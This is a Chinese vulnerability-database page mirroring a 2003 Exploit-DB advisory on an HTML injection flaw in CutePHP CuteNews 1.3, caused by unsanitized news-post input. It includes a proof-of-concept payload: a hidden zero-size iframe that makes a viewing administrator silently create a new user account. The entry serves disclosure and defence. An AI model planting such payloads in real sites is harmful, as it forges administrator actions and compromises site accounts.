CutePHP CuteNews 1.3 – HTML Injection

CutePHP CuteNews 1.3 – HTML Injection

漏洞ID 1053995 漏洞类型
发布时间 2003-06-29 更新时间 2003-06-29
图片[1]-CutePHP CuteNews 1.3 – HTML Injection-安全小百科CVE编号 N/A
图片[2]-CutePHP CuteNews 1.3 – HTML Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22842
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8060/info

CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of malicious HTML code.

<iframe src="index.php?regusername=owned&regpassword= pass&regnickname=owned&regemail=nonenone.com&reglevel= 1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>

相关推荐: AIX piobe Buffer Overflow Vulnerability

AIX piobe Buffer Overflow Vulnerability 漏洞ID 1103613 漏洞类型 Boundary Condition Error 发布时间 2000-12-01 更新时间 2000-12-01 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享